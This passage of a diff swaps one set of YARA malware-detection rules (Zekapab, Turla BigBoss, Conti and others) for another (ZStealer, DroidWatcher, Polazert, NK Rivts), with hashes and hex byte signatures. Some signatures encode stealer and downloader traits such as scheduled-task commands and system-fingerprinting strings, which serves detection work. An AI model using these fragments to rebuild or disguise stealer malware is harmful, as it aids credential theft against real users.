+		$s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b }
 
 	condition:
-		uint16( 0 ) == 0x4D5A and filesize < 450KB and 14 of them
+		filesize > 8KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Zekapab used by APT28 group"
+		description = "Detect ZStealer stealer used by Void Balaur group"
 		author = "Arkbird_SOLG"
-		id = "634f32dd-8bcf-5c58-a335-9b66ff568a54"
-		date = "2021-03-15"
-		modified = "2021-03-15"
-		reference = "https://twitter.com/DrunkBinary/status/1371423755608719360"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25"
+		id = "0282884b-569a-5e46-a6ad-d2776ff71ddb"
+		date = "2021-11-11"
+		modified = "2021-11-12"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6"
-		score = 60
-		quality = 23
+		logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15"
+		hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052"
+		hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f"
+		tlp = "white"
+		adversary = "Void Balaur"
 
 	strings:
-		$s1 = { 68 74 74 70 3A 2F 2F }
-		$s2 = { 68 74 74 70 73 3A 2F 2F }
-		$s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 }
-		$s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 }
-		$s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 }
-		$s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 }
-		$header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 }
-		$header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 }
-		$dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 }
-		$dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 }
-		$dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e }
-		$dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 }
-		$dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e }
-		$dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 }
+		$s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 }
+		$s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff }
+		$s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 }
+		$s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 }
+		$s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 1 of ( $header* ) and 3 of ( $s* ) and 4 of ( $dbg* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of them
 }
-rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detects new BigBoss implants (SilentMoon/GoldenSky)"
+		description = "Detect modified DroidWatcher stealer used by Void Balaur group"
 		author = "Arkbird_SOLG"
-		id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be"
-		date = "2021-04-06"
-		modified = "2021-07-17"
-		reference = "https://twitter.com/DrunkBinary/status/1304086230540390400"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21"
+		id = "04e02521-d89a-5f72-8b6f-0350f6defdd0"
+		date = "2021-11-11"
+		modified = "2021-11-12"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998"
-		score = 75
-		quality = 71
+		logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd"
-		hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb"
-		hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a"
+		hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6"
+		tlp = "white"
+		level = "Experimental"
+		adversary = "Void Balaur"
 
 	strings:
-		$s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 }
-		$s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c }
-		$s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 }
-		$s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 }
-		$s5 = "%d blocks, %d sorted, %d scanned" ascii fullword
-		$s6 = "REMOTE_NS:ERROR:%d" ascii fullword
-		$s7 = { 5c 5c 25 73 5c 69 70 63 24 }
-		$s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 }
+		$s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C }
+		$s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 }
+		$s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 }
+		$s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB }
+		$s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
+		uint32be( 0 ) == 0x504B0304 and filesize > 300KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect unknown TA that focus russian people"
+		description = "Detect Polazert stealer"
 		author = "Arkbird_SOLG"
-		id = "228e194c-84d9-562a-8811-326c5efeafae"
-		date = "2020-07-14"
-		modified = "2021-07-14"
-		reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19"
+		id = "c7766749-558f-50b8-9054-01f5c4e1238b"
+		date = "2021-04-11"
+		modified = "2021-04-11"
+		reference = "https://bazaar.abuse.ch/browse/tag/Polazert/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-11/Polazert/MAL_Polazert_Apr_2021_1.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71"
+		logic_hash = "29cefeb3816435e70c706ac78395738f075f6c9f81d63e7295b0d8a6f370b51d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524"
-		tlp = "white"
-		adversary = "-"
 
 	strings:
-		$s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 }
-		$s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 }
-		$s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 }
-		$s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide
-		$s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 }
-		$s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 }
+		$seq1 = { 73 ?? 00 00 0a 13 ?? 11 ?? 72 [2] 00 70 6f ?? 00 00 0a 00 11 ?? 72 [2] 00 70 11 ?? 72 [2] 00 70 28 ?? 00 00 0a 6f ?? 00 00 0a 00 11 ?? 17 6f ?? 00 00 0a 00 11 ?? 28 ?? 00 00 0a 26 }
+		$seq2 = { 1b 8d 0e 00 00 01 13 ?? 11 ?? 16 72 a1 03 00 70 a2 11 ?? 17 08 a2 11 ?? 18 72 53 03 00 70 a2 11 ?? 19 11 ?? a2 11 ?? 1a 72 e7 03 00 70 a2 11 ?? 28 47 00 00 0a 13 0a }
+		$seq3 = { 02 73 ?? 00 00 0a 28 ?? 00 00 0a 74 2a 00 00 01 [2-4] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 87 01 00 70 6f ?? 00 00 0a 00 03 [1-2] 73 ?? 00 00 0a 13 }
+		$seq4 = { 1f 0f 8d ?? 00 00 01 13 ?? 11 ?? 16 72 ?? ?? 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 28 ?? 00 00 06 a2 11 ?? 1a 72 ?? ?? 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 ?? ?? 00 70 a2 11 ?? 1d 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1e 72 ?? ?? 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1f 0a 72 [2] 00 70 a2 11 ?? 1f 0b [1-2] 7b 01 00 00 04 a2 11 ?? 1f 0c 72 [2] 00 70 a2 11 ?? 1f 0d 28 ?? 00 00 06 a2 11 ?? 1f 0e 72 [2] 00 70 a2 11 ?? 28 ?? 00 00 0a 13 }
+		$seq5 = { 1f ?? 8d ?? 00 00 01 13 ?? 11 ?? 16 72 91 01 00 70 a2 11 ?? 17 1a 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 68 9d 11 ?? 17 1f 77 9d 11 ?? 18 1f 69 9d 11 ?? 19 1f 64 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 18 72 b7 01 00 70 a2 11 ?? 19 ?? [0-1] a2 11 ?? 1a 72 bf 01 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 db 01 00 70 a2 11 ?? 1d 28 ?? 00 00 06 a2 11 ?? 1e 72 f7 01 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 0d 02 00 70 2b 05 72 15 02 00 70 a2 11 ?? 1f 0a 72 1d 02 00 70 a2 11 ?? 1f 0b 28 ?? 00 00 06 2d 07 72 37 02 00 70 2b 05 72 41 02 00 70 a2 11 ?? 1f 0c 72 4d 02 00 70 a2 11 ?? 1f 0d ?? 7b ?? 00 00 04 a2 11 ?? 1f 0e 72 69 02 00 70 a2 11 ?? 1f 0f 1f 09 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 6b 9d 11 ?? 1a 1f 67 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 6f 9d 11 ?? 1d 1f 75 9d 11 ?? 1e 1f 70 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 10 72 b7 01 00 70 a2 11 ?? 1f 11 28 ?? 00 00 06 a2 11 ?? 1f 12 72 71 02 00 70 a2 11 ?? 1f 13 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 6d 9d 11 ?? 19 1f 61 9d 11 ?? 1a 1f 69 9d 11 ?? 1b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 a2 11 ?? 1f 14 72 69 02 00 70 a2 11 ?? 1f 15 19 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6e 9d 11 ?? 18 1f 73 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 16 72 79 02 00 70 a2 11 ?? 1f 17 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1f 0c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 70 9d 11 ?? 17 1f 61 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 74 9d 11 ?? 1a 1f 6f 9d 11 ?? 1b 1f 66 9d 11 ?? 1c 1f 64 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 61 9d 11 ?? 1f 0a 1f 69 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 6f ?? 00 00 0a 72 7f 02 00 70 28 ?? 00 00 0a 2d 07 72 8b 02 00 70 2b 05 72 8f 02 00 70 a2 11 ?? 1f 18 }
+		$seq6 = { 13 30 02 00 2d 00 00 00 ?? 00 00 11 00 72 ?? ?? 00 70 28 ?? 00 00 0a 28 ?? 00 00 0a 73 ?? 00 00 0a 0a 06 72 ?? ?? 00 70 6f ?? 00 00 0a 0b 07 6f ?? 00 00 0a }
+		$seq7 = { 8d ?? 00 00 01 13 ?? 11 ?? 16 72 [2] 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 [2] a2 11 ?? 1a 72 [2] 00 70 a2 11 }
+		$seq8 = { 12 ?? 28 ?? 00 00 06 0f 00 28 ?? 00 00 06 d0 ?? 00 00 1b 28 ?? 00 00 0a 28 ?? 00 00 0a a5 ?? 00 00 1b [1-2] 2b 00 [1-2] 2a }
+		$seq9 = { 1f 10 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 47 9d 11 ?? 17 1f 65 9d 11 ?? 18 1f 74 9d 11 ?? 19 1f 54 9d 11 ?? 1a 1f 68 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 65 9d 11 ?? 1d 1f 61 9d 11 ?? 1e 1f 64 9d 11 ?? 1f 09 1f 43 9d 11 ?? 1f 0a 1f 6f 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 1f 0c 1f 74 9d 11 ?? 1f 0d 1f 65 9d 11 ?? 1f 0e 1f 78 9d 11 ?? 1f 0f 1f 74 9d 11 ?? 28 97 00 00 06 28 09 00 00 2b 13 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 8KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of them
 }
-rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_NK_Rivts_Feb_2009_1 : FILE
 {
 	meta:
-		description = "Detect Conti ransomware (v3)"
+		description = "Detect Rivts malware used by NK APT"
 		author = "Arkbird_SOLG"
-		id = "efa65b86-95d7-55fd-b98a-7b3c747a671c"
-		date = "2021-12-16"
-		modified = "2021-12-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19"
+		id = "71dacbd4-36bb-5a45-a288-31bfaef784dc"
+		date = "2020-06-17"
+		modified = "2020-06-18"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1272674621381361672"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-07/NK_Rivts_Feb_2009_1.yar#L3-L22"
 		license_url = "N/A"
-		logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70"
+		logic_hash = "aab3e8067933cbaef2725b5db9e744df2e2be0a89aaf7ce85df79c5f45d72d8f"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b"
-		hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941"
-		hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1"
-		tlp = "white"
-		adversary = "RAAS"
+		hash1 = "244885b47ec2157a8ea9278bec3ea1883f45d97b1fcb78d4fa875bef0f329a97"
 
 	strings:
